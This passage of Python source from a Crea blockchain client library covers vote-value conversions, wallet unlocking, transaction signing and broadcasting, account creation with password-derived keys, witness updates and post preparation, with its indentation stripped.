vote rshares decreases the reward pool.
"""
vesting_shares = int(self.sp_to_vests(sp, use_stored_data=use_stored_data))
return self.vests_to_sbd(vesting_shares, voting_power=voting_power, vote_pct=vote_pct, not_broadcasted_vote=not_broadcasted_vote, use_stored_data=use_stored_data)
def vests_to_sbd(self, vests, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, not_broadcasted_vote=True, use_stored_data=True):
""" Obtain the resulting CBD vote value from vests
:param number vests: vesting shares
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very big votes. Slight modification to the value calculation, as the not_broadcasted
vote rshares decreases the reward pool.
"""
vote_rshares = self.vests_to_rshares(vests, voting_power=voting_power, vote_pct=vote_pct)
return self.rshares_to_sbd(vote_rshares, not_broadcasted_vote=not_broadcasted_vote, use_stored_data=use_stored_data)
def _max_vote_denom(self, use_stored_data=True):
# get props
global_properties = self.get_dynamic_global_properties(use_stored_data=use_stored_data)
vote_power_reserve_rate = global_properties['vote_power_reserve_rate']
max_vote_denom = vote_power_reserve_rate * CREA_VOTE_REGENERATION_SECONDS
return max_vote_denom
def _calc_resulting_vote(self, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, use_stored_data=True):
# determine voting power used
used_power = int((voting_power * abs(vote_pct)) / CREA_100_PERCENT * (60 * 60 * 24))
max_vote_denom = self._max_vote_denom(use_stored_data=use_stored_data)
used_power = int((used_power + max_vote_denom - 1) / max_vote_denom)
return used_power
def sp_to_rshares(self, crea_power, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, use_stored_data=True):
""" Obtain the r-shares from Crea power
:param number crea_power: Crea Power
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
"""
# calculate our account voting shares (from vests)
vesting_shares = int(self.sp_to_vests(crea_power, use_stored_data=use_stored_data))
return self.vests_to_rshares(vesting_shares, voting_power=voting_power, vote_pct=vote_pct, use_stored_data=use_stored_data)
def vests_to_rshares(self, vests, voting_power=CREA_100_PERCENT, vote_pct=CREA_100_PERCENT, subtract_dust_threshold=True, use_stored_data=True):
""" Obtain the r-shares from vests
:param number vests: vesting shares
:param int voting_power: voting power (100% = 10000)
:param int vote_pct: voting percentage (100% = 10000)
"""
used_power = self._calc_resulting_vote(voting_power=voting_power, vote_pct=vote_pct, use_stored_data=use_stored_data)
# calculate vote rshares
rshares = int(math.copysign(vests * 1e6 * used_power / CREA_100_PERCENT, vote_pct))
if subtract_dust_threshold:
if abs(rshares) <= self.get_dust_threshold(use_stored_data=use_stored_data):
return 0
rshares -= math.copysign(self.get_dust_threshold(use_stored_data=use_stored_data), vote_pct)
return rshares
def sbd_to_rshares(self, sbd, not_broadcasted_vote=False, use_stored_data=True):
""" Obtain the r-shares from CBD
:param sbd: CBD
:type sbd: str, int, amount.Amount
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very high amounts of CBD. Slight modification to the value calculation, as the not_broadcasted
vote rshares decreases the reward pool.
"""
if isinstance(sbd, Amount):
sbd = Amount(sbd, crea_instance=self)
elif isinstance(sbd, string_types):
sbd = Amount(sbd, crea_instance=self)
else:
sbd = Amount(sbd, self.sbd_symbol, crea_instance=self)
if sbd['symbol'] != self.sbd_symbol:
raise AssertionError('Should input CBD, not any other asset!')
# If the vote was already broadcasted we can assume the blockchain values to be true
if not not_broadcasted_vote:
return int(sbd.amount / self.get_sbd_per_rshares(use_stored_data=use_stored_data))
# If the vote wasn't broadcasted (yet), we have to calculate the rshares while considering
# the change our vote is causing to the recent_claims. This is more important for really
# big votes which have a significant impact on the recent_claims.
reward_fund = self.get_reward_funds(use_stored_data=use_stored_data)
median_price = self.get_median_price(use_stored_data=use_stored_data)
recent_claims = int(reward_fund["recent_claims"])
reward_balance = Amount(reward_fund["reward_balance"], crea_instance=self)
reward_pool_sbd = median_price * reward_balance
if sbd > reward_pool_sbd:
raise ValueError('Provided more CBD than available in the reward pool.')
# This is the formula we can use to determine the "true" rshares.
# We get this formula by some math magic using the previous used formulas
# FundsPerShare = (balance / (claims + newShares)) * Price
# newShares = amount / FundsPerShare
# We can now resolve both formulas for FundsPerShare and set the formulas to be equal
# (balance / (claims + newShares)) * price = amount / newShares
# Now we resolve for newShares resulting in:
# newShares = claims * amount / (balance * price - amount)
rshares = recent_claims * sbd.amount / ((reward_balance.amount * float(median_price)) - sbd.amount)
return int(rshares)
def rshares_to_vote_pct(self, rshares, crea_power=None, vests=None, voting_power=CREA_100_PERCENT, use_stored_data=True):
""" Obtain the voting percentage for a desired rshares value
for a given Crea Power or vesting shares and voting_power
Give either crea_power or vests, not both.
When the output is greater than 10000 or less than -10000,
the given absolute rshares are too high
Returns the required voting percentage (100% = 10000)
:param number rshares: desired rshares value
:param number crea_power: Crea Power
:param number vests: vesting shares
:param int voting_power: voting power (100% = 10000)
"""
if crea_power is None and vests is None:
raise ValueError("Either crea_power or vests has to be set!")
if crea_power is not None and vests is not None:
raise ValueError("Either crea_power or vests has to be set. Not both!")
if crea_power is not None:
vests = int(self.sp_to_vests(crea_power, use_stored_data=use_stored_data) * 1e6)
if self.hardfork >= 20:
rshares += math.copysign(self.get_dust_threshold(use_stored_data=use_stored_data), rshares)
max_vote_denom = self._max_vote_denom(use_stored_data=use_stored_data)
used_power = int(math.ceil(abs(rshares) * CREA_100_PERCENT / vests))
used_power = used_power * max_vote_denom
vote_pct = used_power * CREA_100_PERCENT / (60 * 60 * 24) / voting_power
return int(math.copysign(vote_pct, rshares))
def sbd_to_vote_pct(self, sbd, crea_power=None, vests=None, voting_power=CREA_100_PERCENT, not_broadcasted_vote=True, use_stored_data=True):
""" Obtain the voting percentage for a desired CBD value
for a given Crea Power or vesting shares and voting power
Give either Crea Power or vests, not both.
When the output is greater than 10000 or smaller than -10000,
the CBD value is too high.
Returns the required voting percentage (100% = 10000)
:param sbd: desired CBD value
:type sbd: str, int, amount.Amount
:param number crea_power: Crea Power
:param number vests: vesting shares
:param bool not_broadcasted_vote: not_broadcasted or already broadcasted vote (True = not_broadcasted vote).
Only impactful for very high amounts of CBD. Slight modification to the value calculation, as the not_broadcasted
vote rshares decreases the reward pool.
"""
if isinstance(sbd, Amount):
sbd = Amount(sbd, crea_instance=self)
elif isinstance(sbd, string_types):
sbd = Amount(sbd, crea_instance=self)
else:
sbd = Amount(sbd, self.sbd_symbol, crea_instance=self)
if sbd['symbol'] != self.sbd_symbol:
raise AssertionError()
rshares = self.sbd_to_rshares(sbd, not_broadcasted_vote=not_broadcasted_vote, use_stored_data=use_stored_data)
return self.rshares_to_vote_pct(rshares, crea_power=crea_power, vests=vests, voting_power=voting_power, use_stored_data=use_stored_data)
def get_chain_properties(self, use_stored_data=True):
""" Return witness elected chain properties
Properties:::
{
'account_creation_fee': '30.000 CREA',
'maximum_block_size': 65536,
'sbd_interest_rate': 250
}
"""
if use_stored_data:
self.refresh_data()
return self.data['witness_schedule']['median_props']
else:
return self.get_witness_schedule(use_stored_data)['median_props']
def get_witness_schedule(self, use_stored_data=True):
""" Return witness elected chain properties
"""
if use_stored_data:
self.refresh_data()
return self.data['witness_schedule']
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
return self.rpc.get_witness_schedule(api="database")
def get_config(self, use_stored_data=True):
""" Returns internal chain configuration.
:param bool use_stored_data: If True, the cached value is returned
"""
if use_stored_data:
self.refresh_data()
config = self.data['config']
else:
if self.rpc is None:
return None
self.rpc.set_next_node_on_empty_reply(True)
config = self.rpc.get_config(api="database")
return config
@property
def chain_params(self):
if self.offline or self.rpc is None:
return known_chains["CREA"]
else:
return self.get_network()
@property
def hardfork(self):
if self.offline or self.rpc is None:
versions = known_chains['CREA']['min_version']
else:
hf_prop = self.get_hardfork_properties()
if "current_hardfork_version" in hf_prop:
versions = hf_prop["current_hardfork_version"]
else:
versions = self.get_blockchain_version()
return int(versions.split('.')[1])
@property
def prefix(self):
return self.chain_params["prefix"]
def set_default_account(self, account):
""" Set the default account to be used
"""
Account(account, crea_instance=self)
config["default_account"] = account
def set_password_storage(self, password_storage):
""" Set the password storage mode.
When set to "no", the password has to be provided each time.
When set to "environment" the password is taken from the
UNLOCK variable
When set to "keyring" the password is taken from the
python keyring module. A wallet password can be stored with
python -m keyring set crea wallet password
:param str password_storage: can be "no",
"keyring" or "environment"
"""
config["password_storage"] = password_storage
def set_default_nodes(self, nodes):
""" Set the default nodes to be used
"""
if bool(nodes):
if isinstance(nodes, list):
nodes = str(nodes)
config["node"] = nodes
else:
config.delete("node")
def get_default_nodes(self):
"""Returns the default nodes"""
if "node" in config:
nodes = config["node"]
elif "nodes" in config:
nodes = config["nodes"]
elif "default_nodes" in config and bool(config["default_nodes"]):
nodes = config["default_nodes"]
else:
nodes = []
if isinstance(nodes, str) and nodes[0] == '[' and nodes[-1] == ']':
nodes = ast.literal_eval(nodes)
return nodes
def move_current_node_to_front(self):
"""Returns the default node list, until the first entry
is equal to the current working node url
"""
node = self.get_default_nodes()
if len(node) < 2:
return
offline = self.offline
while not offline and node[0] != self.rpc.url and len(node) > 1:
node = node[1:] + [node[0]]
self.set_default_nodes(node)
def set_default_vote_weight(self, vote_weight):
""" Set the default vote weight to be used
"""
config["default_vote_weight"] = vote_weight
def finalizeOp(self, ops, account, permission, **kwargs):
""" This method obtains the required private keys if present in
the wallet, finalizes the transaction, signs it and
broadacasts it
:param ops: The operation (or list of operations) to
broadcast
:type ops: list, GrapheneObject
:param Account account: The account that authorizes the
operation
:param string permission: The required permission for
signing (active, owner, posting)
:param TransactionBuilder append_to: This allows to provide an instance of
TransactionBuilder (see :func:`Crea.new_tx()`) to specify
where to put a specific operation.
.. note:: ``append_to`` is exposed to every method used in the
Crea class
.. note:: If ``ops`` is a list of operation, they all need to be
signable by the same key! Thus, you cannot combine ops
that require active permission with ops that require
posting permission. Neither can you use different
accounts for different operations!
.. note:: This uses :func:`Crea.txbuffer` as instance of
:class:`crea.transactionbuilder.TransactionBuilder`.
You may want to use your own txbuffer
"""
if self.offline:
return {}
if "append_to" in kwargs and kwargs["append_to"]:
# Append to the append_to and return
append_to = kwargs["append_to"]
parent = append_to.get_parent()
if not isinstance(append_to, (TransactionBuilder)):
raise AssertionError()
append_to.appendOps(ops)
# Add the signer to the buffer so we sign the tx properly
parent.appendSigner(account, permission)
# This returns as we used append_to, it does NOT broadcast, or sign
return append_to.get_parent()
# Go forward to see what the other options do ...
else:
# Append to the default buffer
self.txbuffer.appendOps(ops)
# Add signing information, signer, sign and optionally broadcast
if self.unsigned:
# In case we don't want to sign anything
self.txbuffer.addSigningInformation(account, permission)
return self.txbuffer
elif self.bundle:
# In case we want to add more ops to the tx (bundle)
self.txbuffer.appendSigner(account, permission)
return self.txbuffer.json()
else:
# default behavior: sign + broadcast
self.txbuffer.appendSigner(account, permission)
self.txbuffer.sign()
return self.txbuffer.broadcast()
def sign(self, tx=None, wifs=[], reconstruct_tx=True):
""" Sign a provided transaction with the provided key(s)
:param dict tx: The transaction to be signed and returned
:param string wifs: One or many wif keys to use for signing
a transaction. If not present, the keys will be loaded
from the wallet as defined in "missing_signatures" key
of the transactions.
:param bool reconstruct_tx: when set to False and tx
is already contructed, it will not reconstructed
and already added signatures remain
"""
if tx:
txbuffer = TransactionBuilder(tx, crea_instance=self)
else:
txbuffer = self.txbuffer
txbuffer.appendWif(wifs)
txbuffer.appendMissingSignatures()
txbuffer.sign(reconstruct_tx=reconstruct_tx)
return txbuffer.json()
def broadcast(self, tx=None):
""" Broadcast a transaction to the Crea network
:param tx tx: Signed transaction to broadcast
"""
if tx:
# If tx is provided, we broadcast the tx
return TransactionBuilder(tx, crea_instance=self).broadcast()
else:
return self.txbuffer.broadcast()
def info(self, use_stored_data=True):
""" Returns the global properties
"""
return self.get_dynamic_global_properties(use_stored_data=use_stored_data)
# -------------------------------------------------------------------------
# Wallet stuff
# -------------------------------------------------------------------------
def newWallet(self, pwd):
""" Create a new wallet. This method is basically only calls
:func:`crea.wallet.Wallet.create`.
:param str pwd: Password to use for the new wallet
:raises WalletExists: if there is already a
wallet created
"""
return self.wallet.create(pwd)
def unlock(self, *args, **kwargs):
""" Unlock the internal wallet
"""
return self.wallet.unlock(*args, **kwargs)
# -------------------------------------------------------------------------
# Transaction Buffers
# -------------------------------------------------------------------------
@property
def txbuffer(self):
""" Returns the currently active tx buffer
"""
return self.tx()
def tx(self):
""" Returns the default transaction buffer
"""
return self._txbuffers[0]
def new_tx(self, *args, **kwargs):
""" Let's obtain a new txbuffer
:returns: id of the new txbuffer
:rtype: int
"""
builder = TransactionBuilder(
*args,
crea_instance=self,
**kwargs
)
self._txbuffers.append(builder)
return builder
def clear(self):
self._txbuffers = []
# Base/Default proposal/tx buffers
self.new_tx()
# self.new_proposal()
# -------------------------------------------------------------------------
# Account related calls
# -------------------------------------------------------------------------
def claim_account(self, creator, fee=None, **kwargs):
""" Claim account for claimed account creation.
When fee is 0 CREA a subsidized account is claimed and can be created
later with create_claimed_account.
The number of subsidized account is limited.
:param str creator: which account should pay the registration fee (RC or CREA)
(defaults to ``default_account``)
:param str fee: when set to 0 CREA (default), claim account is paid by RC
"""
fee = fee if fee is not None else "0 %s" % (self.crea_symbol)
if not creator and config["default_account"]:
creator = config["default_account"]
if not creator:
raise ValueError(
"Not creator account given. Define it with " +
"creator=x, or set the default_account using creapy")
creator = Account(creator, crea_instance=self)
op = {
"fee": Amount(fee, crea_instance=self),
"creator": creator["name"],
"prefix": self.prefix,
}
op = operations.Claim_account(**op)
return self.finalizeOp(op, creator, "active", **kwargs)
def create_claimed_account(
self,
account_name,
creator=None,
owner_key=None,
active_key=None,
memo_key=None,
posting_key=None,
password=None,
additional_owner_keys=[],
additional_active_keys=[],
additional_posting_keys=[],
additional_owner_accounts=[],
additional_active_accounts=[],
additional_posting_accounts=[],
storekeys=True,
store_owner_key=False,
json_meta=None,
combine_with_claim_account=False,
fee=None,
**kwargs
):
""" Create new claimed account on Crea
The brainkey/password can be used to recover all generated keys
(see :class:`creagraphenebase.account` for more details.
By default, this call will use ``default_account`` to
register a new name ``account_name`` with all keys being
derived from a new brain key that will be returned. The
corresponding keys will automatically be installed in the
wallet.
.. warning:: Don't call this method unless you know what
you are doing! Be sure to understand what this
method does and where to find the private keys
for your account.
.. note:: Please note that this imports private keys
(if password is present) into the wallet by
default when nobroadcast is set to False.
However, it **does not import the owner
key** for security reasons by default.
If you set store_owner_key to True, the
owner key is stored.
Do NOT expect to be able to recover it from
the wallet if you lose your password!
.. note:: Account creations cost a fee that is defined by
the network. If you create an account, you will
need to pay for that fee!
:param str account_name: (**required**) new account name
:param str json_meta: Optional meta data for the account
:param str owner_key: Main owner key
:param str active_key: Main active key
:param str posting_key: Main posting key
:param str memo_key: Main memo_key
:param str password: Alternatively to providing keys, one
can provide a password from which the
keys will be derived
:param array additional_owner_keys: Additional owner public keys
:param array additional_active_keys: Additional active public keys
:param array additional_posting_keys: Additional posting public keys
:param array additional_owner_accounts: Additional owner account
names
:param array additional_active_accounts: Additional acctive account
names
:param bool storekeys: Store new keys in the wallet (default:
``True``)
:param bool combine_with_claim_account: When set to True, a
claim_account operation is additionally broadcasted
:param str fee: When combine_with_claim_account is set to True,
this parameter is used for the claim_account operation
:param str creator: which account should pay the registration fee
(defaults to ``default_account``)
:raises AccountExistsException: if the account already exists on
the blockchain
"""
fee = fee if fee is not None else "0 %s" % (self.crea_symbol)
if not creator and config["default_account"]:
creator = config["default_account"]
if not creator:
raise ValueError(
"Not creator account given. Define it with " +
"creator=x, or set the default_account using creapy")
if password and (owner_key or active_key or memo_key):
raise ValueError(
"You cannot use 'password' AND provide keys!"
)
try:
Account(account_name, crea_instance=self)
raise AccountExistsException
except AccountDoesNotExistsException:
pass
creator = Account(creator, crea_instance=self)
" Generate new keys from password"
from creagraphenebase.account import PasswordKey
if password:
active_key = PasswordKey(account_name, password, role="active", prefix=self.prefix)
owner_key = PasswordKey(account_name, password, role="owner", prefix=self.prefix)
posting_key = PasswordKey(account_name, password, role="posting", prefix=self.prefix)
memo_key = PasswordKey(account_name, password, role="memo", prefix=self.prefix)
active_pubkey = active_key.get_public_key()
owner_pubkey = owner_key.get_public_key()
posting_pubkey = posting_key.get_public_key()
memo_pubkey = memo_key.get_public_key()
active_privkey = active_key.get_private_key()
posting_privkey = posting_key.get_private_key()
owner_privkey = owner_key.get_private_key()
memo_privkey = memo_key.get_private_key()
# store private keys
try:
if storekeys and not self.nobroadcast:
if store_owner_key:
self.wallet.addPrivateKey(str(owner_privkey))
self.wallet.addPrivateKey(str(active_privkey))
self.wallet.addPrivateKey(str(memo_privkey))
self.wallet.addPrivateKey(str(posting_privkey))
except ValueError as e:
log.info(str(e))
elif (owner_key and active_key and memo_key and posting_key):
active_pubkey = PublicKey(
active_key, prefix=self.prefix)
owner_pubkey = PublicKey(
owner_key, prefix=self.prefix)
posting_pubkey = PublicKey(
posting_key, prefix=self.prefix)
memo_pubkey = PublicKey(
memo_key, prefix=self.prefix)
else:
raise ValueError(
"Call incomplete! Provide either a password or public keys!"
)
owner = format(owner_pubkey, self.prefix)
active = format(active_pubkey, self.prefix)
posting = format(posting_pubkey, self.prefix)
memo = format(memo_pubkey, self.prefix)
owner_key_authority = [[owner, 1]]
active_key_authority = [[active, 1]]
posting_key_authority = [[posting, 1]]
owner_accounts_authority = []
active_accounts_authority = []
posting_accounts_authority = []
# additional authorities
for k in additional_owner_keys:
owner_key_authority.append([k, 1])
for k in additional_active_keys:
active_key_authority.append([k, 1])
for k in additional_posting_keys:
posting_key_authority.append([k, 1])
for k in additional_owner_accounts:
addaccount = Account(k, crea_instance=self)
owner_accounts_authority.append([addaccount["name"], 1])
for k in additional_active_accounts:
addaccount = Account(k, crea_instance=self)
active_accounts_authority.append([addaccount["name"], 1])
for k in additional_posting_accounts:
addaccount = Account(k, crea_instance=self)
posting_accounts_authority.append([addaccount["name"], 1])
if combine_with_claim_account:
op = {
"fee": Amount(fee, crea_instance=self),
"creator": creator["name"],
"prefix": self.prefix,
}
op = operations.Claim_account(**op)
ops = [op]
op = {
"creator": creator["name"],
"new_account_name": account_name,
'owner': {'account_auths': owner_accounts_authority,
'key_auths': owner_key_authority,
"address_auths": [],
'weight_threshold': 1},
'active': {'account_auths': active_accounts_authority,
'key_auths': active_key_authority,
"address_auths": [],
'weight_threshold': 1},
'posting': {'account_auths': active_accounts_authority,
'key_auths': posting_key_authority,
"address_auths": [],
'weight_threshold': 1},
'memo_key': memo,
"json_metadata": json_meta or {},
"prefix": self.prefix,
}
op = operations.Create_claimed_account(**op)
if combine_with_claim_account:
ops.append(op)
return self.finalizeOp(ops, creator, "active", **kwargs)
else:
return self.finalizeOp(op, creator, "active", **kwargs)
def create_account(
self,
account_name,
creator=None,
owner_key=None,
active_key=None,
memo_key=None,
posting_key=None,
password=None,
additional_owner_keys=[],
additional_active_keys=[],
additional_posting_keys=[],
additional_owner_accounts=[],
additional_active_accounts=[],
additional_posting_accounts=[],
storekeys=True,
store_owner_key=False,
json_meta=None,
**kwargs
):
""" Create new account on Crea
The brainkey/password can be used to recover all generated keys
(see :class:`creagraphenebase.account` for more details.
By default, this call will use ``default_account`` to
register a new name ``account_name`` with all keys being
derived from a new brain key that will be returned. The
corresponding keys will automatically be installed in the
wallet.
.. warning:: Don't call this method unless you know what
you are doing! Be sure to understand what this
method does and where to find the private keys
for your account.
.. note:: Please note that this imports private keys
(if password is present) into the wallet by
default when nobroadcast is set to False.
However, it **does not import the owner
key** for security reasons by default.
If you set store_owner_key to True, the
owner key is stored.
Do NOT expect to be able to recover it from
the wallet if you lose your password!
.. note:: Account creations cost a fee that is defined by
the network. If you create an account, you will
need to pay for that fee!
:param str account_name: (**required**) new account name
:param str json_meta: Optional meta data for the account
:param str owner_key: Main owner key
:param str active_key: Main active key
:param str posting_key: Main posting key
:param str memo_key: Main memo_key
:param str password: Alternatively to providing keys, one
can provide a password from which the
keys will be derived
:param array additional_owner_keys: Additional owner public keys
:param array additional_active_keys: Additional active public keys
:param array additional_posting_keys: Additional posting public keys
:param array additional_owner_accounts: Additional owner account
names
:param array additional_active_accounts: Additional acctive account
names
:param bool storekeys: Store new keys in the wallet (default:
``True``)
:param str creator: which account should pay the registration fee
(defaults to ``default_account``)
:raises AccountExistsException: if the account already exists on
the blockchain
"""
if not creator and config["default_account"]:
creator = config["default_account"]
if not creator:
raise ValueError(
"Not creator account given. Define it with " +
"creator=x, or set the default_account using creapy")
if password and (owner_key or active_key or memo_key):
raise ValueError(
"You cannot use 'password' AND provide keys!"
)
try:
Account(account_name, crea_instance=self)
raise AccountExistsException
except AccountDoesNotExistsException:
pass
creator = Account(creator, crea_instance=self)
" Generate new keys from password"
from creagraphenebase.account import PasswordKey
if password:
active_key = PasswordKey(account_name, password, role="active", prefix=self.prefix)
owner_key = PasswordKey(account_name, password, role="owner", prefix=self.prefix)
posting_key = PasswordKey(account_name, password, role="posting", prefix=self.prefix)
memo_key = PasswordKey(account_name, password, role="memo", prefix=self.prefix)
active_pubkey = active_key.get_public_key()
owner_pubkey = owner_key.get_public_key()
posting_pubkey = posting_key.get_public_key()
memo_pubkey = memo_key.get_public_key()
active_privkey = active_key.get_private_key()
posting_privkey = posting_key.get_private_key()
owner_privkey = owner_key.get_private_key()
memo_privkey = memo_key.get_private_key()
# store private keys
try:
if storekeys and not self.nobroadcast:
if store_owner_key:
self.wallet.addPrivateKey(str(owner_privkey))
self.wallet.addPrivateKey(str(active_privkey))
self.wallet.addPrivateKey(str(memo_privkey))
self.wallet.addPrivateKey(str(posting_privkey))
except ValueError as e:
log.info(str(e))
elif (owner_key and active_key and memo_key and posting_key):
active_pubkey = PublicKey(
active_key, prefix=self.prefix)
owner_pubkey = PublicKey(
owner_key, prefix=self.prefix)
posting_pubkey = PublicKey(
posting_key, prefix=self.prefix)
memo_pubkey = PublicKey(
memo_key, prefix=self.prefix)
else:
raise ValueError(
"Call incomplete! Provide either a password or public keys!"
)
owner = format(owner_pubkey, self.prefix)
active = format(active_pubkey, self.prefix)
posting = format(posting_pubkey, self.prefix)
memo = format(memo_pubkey, self.prefix)
owner_key_authority = [[owner, 1]]
active_key_authority = [[active, 1]]
posting_key_authority = [[posting, 1]]
owner_accounts_authority = []
active_accounts_authority = []
posting_accounts_authority = []
# additional authorities
for k in additional_owner_keys:
owner_key_authority.append([k, 1])
for k in additional_active_keys:
active_key_authority.append([k, 1])
for k in additional_posting_keys:
posting_key_authority.append([k, 1])
for k in additional_owner_accounts:
addaccount = Account(k, crea_instance=self)
owner_accounts_authority.append([addaccount["name"], 1])
for k in additional_active_accounts:
addaccount = Account(k, crea_instance=self)
active_accounts_authority.append([addaccount["name"], 1])
for k in additional_posting_accounts:
addaccount = Account(k, crea_instance=self)
posting_accounts_authority.append([addaccount["name"], 1])
props = self.get_chain_properties()
if self.hardfork >= 20:
required_fee_crea = Amount(props["account_creation_fee"], crea_instance=self)
else:
required_fee_crea = Amount(props["account_creation_fee"], crea_instance=self) * 30
op = {
"fee": required_fee_crea,
"creator": creator["name"],
"new_account_name": account_name,
'owner': {'account_auths': owner_accounts_authority,
'key_auths': owner_key_authority,
"address_auths": [],
'weight_threshold': 1},
'active': {'account_auths': active_accounts_authority,
'key_auths': active_key_authority,
"address_auths": [],
'weight_threshold': 1},
'posting': {'account_auths': posting_accounts_authority,
'key_auths': posting_key_authority,
"address_auths": [],
'weight_threshold': 1},
'memo_key': memo,
"json_metadata": json_meta or {},
"prefix": self.prefix,
}
op = operations.Account_create(**op)
return self.finalizeOp(op, creator, "active", **kwargs)
def witness_set_properties(self, wif, owner, props, use_condenser_api=True):
""" Set witness properties
:param str wif: Private signing key
:param dict props: Properties
:param str owner: witness account name
Properties:::
{
"account_creation_fee": x,
"account_subsidy_budget": x,
"account_subsidy_decay": x,
"maximum_block_size": x,
"url": x,
"sbd_exchange_rate": x,
"sbd_interest_rate": x,
"new_signing_key": x
}
"""
owner = Account(owner, crea_instance=self)
try:
PrivateKey(wif, prefix=self.prefix)
except Exception as e:
raise e
props_list = [["key", repr(PrivateKey(wif, prefix=self.prefix).pubkey)]]
for k in props:
props_list.append([k, props[k]])
op = operations.Witness_set_properties({"owner": owner["name"], "props": props_list, "prefix": self.prefix})
tb = TransactionBuilder(use_condenser_api=use_condenser_api, crea_instance=self)
tb.appendOps([op])
tb.appendWif(wif)
tb.sign()
return tb.broadcast()
def witness_update(self, signing_key, url, props, account=None, **kwargs):
""" Creates/updates a witness
:param str signing_key: Public signing key
:param str url: URL
:param dict props: Properties
:param str account: (optional) witness account name
Properties:::
{
"account_creation_fee": "3.000 CREA",
"maximum_block_size": 65536,
"sbd_interest_rate": 0,
}
"""
if not account and config["default_account"]:
account = config["default_account"]
if not account:
raise ValueError("You need to provide an account")
account = Account(account, crea_instance=self)
try:
PublicKey(signing_key, prefix=self.prefix)
except Exception as e:
raise e
if "account_creation_fee" in props:
props["account_creation_fee"] = Amount(props["account_creation_fee"], crea_instance=self)
op = operations.Witness_update(
**{
"owner": account["name"],
"url": url,
"block_signing_key": signing_key,
"props": props,
"fee": Amount(0, self.crea_symbol, crea_instance=self),
"prefix": self.prefix,
})
return self.finalizeOp(op, account, "active", **kwargs)
def _test_weights_treshold(self, authority):
""" This method raises an error if the threshold of an authority cannot
be reached by the weights.
:param dict authority: An authority of an account
:raises ValueError: if the threshold is set too high
"""
weights = 0
for a in authority["account_auths"]:
weights += int(a[1])
for a in authority["key_auths"]:
weights += int(a[1])
if authority["weight_threshold"] > weights:
raise ValueError("Threshold too restrictive!")
if authority["weight_threshold"] == 0:
raise ValueError("Cannot have threshold of 0")
def custom_json(self,
id,
json_data,
required_auths=[],
required_posting_auths=[],
**kwargs):
""" Create a custom json operation
:param str id: identifier for the custom json (max length 32 bytes)
:param json json_data: the json data to put into the custom_json
operation
:param list required_auths: (optional) required auths
:param list required_posting_auths: (optional) posting auths
.. note:: While reqired auths and required_posting_auths are both
optional, one of the two are needed in order to send the custom
json.
.. code-block:: python
crea.custom_json("id", "json_data",
required_posting_auths=['account'])
"""
account = None
if len(required_auths):
account = required_auths[0]
elif len(required_posting_auths):
account = required_posting_auths[0]
else:
raise Exception("At least one account needs to be specified")
account = Account(account, full=False, crea_instance=self)
op = operations.Custom_json(
**{
"json": json_data,
"required_auths": required_auths,
"required_posting_auths": required_posting_auths,
"id": id,
"prefix": self.prefix,
})
return self.finalizeOp(op, account, "posting", **kwargs)
def post(self,
title,
body,
author=None,
permlink=None,
reply_identifier=None,
json_metadata=None,
comment_options=None,
community=None,
app=None,
tags=None,
beneficiaries=None,
self_vote=False,
parse_body=False,
**kwargs):
""" Create a new post.
If this post is intended as a reply/comment, `reply_identifier` needs
to be set with the identifier of the parent post/comment (eg.
`@author/permlink`).
Optionally you can also set json_metadata, comment_options and upvote
the newly created post as an author.
Setting category, tags or community will override the values provided
in json_metadata and/or comment_options where appropriate.
:param str title: Title of the post
:param str body: Body of the post/comment
:param str author: Account are you posting from
:param str permlink: Manually set the permlink (defaults to None).
If left empty, it will be derived from title automatically.
:param str reply_identifier: Identifier of the parent post/comment (only
if this post is a reply/comment).
:param json_metadata: JSON meta object that can be attached to
the post.
:type json_metadata: str, dict
:param dict comment_options: JSON options object that can be
attached to the post.
Example::
comment_options = {
'max_accepted_payout': '1000000.000 CBD',
'percent_crea_dollars': 10000,
'allow_votes': True,
'allow_curation_rewards': True,
'extensions': [[0, {
'beneficiaries': [
{'account': 'account1', 'weight': 5000},
{'account': 'account2', 'weight': 5000},
]}
]]
}
:param str community: (Optional) Name of the community we are posting
into. This will also override the community specified in
`json_metadata`.
:param str app: (Optional) Name of the app which are used for posting
when not set, crea/<version> is used
:param tags: (Optional) A list of tags to go with the
post. This will also override the tags specified in
`json_metadata`. The first tag will be used as a 'category'. If
provided as a string, it should be space separated.
:type tags: str, list
:param list beneficiaries: (Optional) A list of beneficiaries
for posting reward distribution. This argument overrides
beneficiaries as specified in `comment_options`.
For example, if we would like to split rewards between account1 and
account2::
beneficiaries = [
{'account': 'account1', 'weight': 5000},
{'account': 'account2', 'weight': 5000}
]
:param bool self_vote: (Optional) Upvote the post as author, right after
posting.
:param bool parse_body: (Optional) When set to True, all mentioned users,
used links and images are put into users, links and images array inside
json_metadata. This will override provided links, images and users inside
json_metadata. Hashtags will added to tags until its length is below five entries.
"""
# prepare json_metadata
json_metadata = json_metadata or {}
if isinstance(json_metadata, str):
json_metadata = json.loads(json_metadata)
# override the community
if community:
json_metadata.update({'community': community})
if app:
json_metadata.update({'app': app})
elif 'app' not in json_metadata:
json_metadata.update({'app': 'crea/%s' % (crea_version)})
if not author and config["default_account"]:
author = config["default_account"]
if not author:
raise ValueError("You need to provide an account")
account = Account(author, crea_instance=self)
# deal with the category and tags
if isinstance(tags, str):
tags = list(set([_f for _f in (re.split("[\W_]", tags)) if _f]))
category = None
tags = tags or json_metadata.get('tags', [])
if parse_body:
def get_urls(mdstring):
return list(set(re.findall('http[s]*://[^\s"><\)\(]+', mdstring)))
def get_users(mdstring):
users = []
for u in re.findall('(^|[^a-zA-Z0-9_!#$%&*@@\/]|(^|[^a-zA-Z0-9_+~.-\/#]))[@@]([a-z][-\.a-z\d]+[a-z\d])', mdstring):
users.append(list(u)[-1])
return users
def get_hashtags(mdstring):
hashtags = []
for t in re.findall('(^|\s)(#[-a-z\d]+)', mdstring):
hashtags.append(list(t)[-1])
return hashtags
users = []
image = []
links = []
for url in get_urls(body):
img_exts = ['.jpg', '.png', '.gif', '.svg', '.jpeg']
if os.path.splitext(url)[1].lower() in img_exts:
image.append(url)
else:
links.append(url)
